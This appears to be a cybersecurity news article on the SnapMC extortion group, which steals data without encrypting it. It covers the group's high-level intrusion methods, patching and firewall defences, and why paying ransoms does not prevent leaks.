A different attacker addressed as SnapMC has appeared in the cybercrime space, executing the typical information-hijacking extortion that underpins ransomware operations but without doing the file encryption part.

File encryption is taken as a core component of ransomware attacks, as it is the element that brings operation disruption to the victim. Data exfiltration for aims of double extortion came later as an additional form of leverage against a victim, but always took a back seat to the mayhem caused by an encoded network.

Earlier, ransomware attackers realized the power of this approach as many organizations could restore the corrupted files from backups, but could not possibly revert the file hijacking event and its repercussions.

Investigators have been tracking a new adversary which they called SnapMC, named after the rapid strike approach the gang pursues, who enter networks, hijack files, and transmit extortions emails in under 30 minutes.

Addressing known vulnerabilities

The SnapMC gang uses the Acunetix vulnerability scanner to find a range of flaws in a target’s VPN and web server apps, and then successfully exploits them to breach the corporate network.

The most exploited flaws observed in the actor’s initial access efforts include the PrintNightmare LPE, remote code execution in Telerik UI for ASPX.NET, and also various SQL injection opportunities.

The actors use SQL database exportation scripts to steal the data, while the CSV files are compressed with the 7zip archive utility before exfiltration. Once everything is neatly packed, the MinIO client is used for sending the data back to the attacker.

Considering that SnapMC leverages known vulnerabilities that have already been patched, updating your software tools would be a good way to defend against this rising threat.

As NCC Group points out in its report, even if an organization uses a vulnerable version of Telerik, putting it behind a well-configured Web Application Firewall would render any exploitation efforts futile.

Paying is dangerous

In data exfiltration extortion attacks, meeting the threat actor’s demands by paying ransomware, guarantees nothing. On the contrary, it could give the hackers an incentive to attempt further extortion in the future.

It is also possible that even if a victim pays a ransom, their data may end up sold on criminal marketplaces or hacker forums as an additional way of generating revenue for the attackers.

Ransomware negotiation firm Coveware, strongly advises its clients never to pay a ransom to prevent stolen files from being leaked to the public. During negotiation cases in the past, victims have paid a ransom and their data was still leaked or no proof of deletion was ever provided.

• Sodinokibi: Victims that paid were re-extorted weeks later with threats to post the same data set.
• Netwalker: Data posted of companies that had paid for it not to be leaked
• Mespinoza: Data posted of companies that had paid for it not to be leaked
• Conti: Fake files are shown as proof of deletion

Due to this, victims should automatically assume that their data has been shared with other threat actors and that it will be used or leaked in the future, regardless of whether they paid a ransom.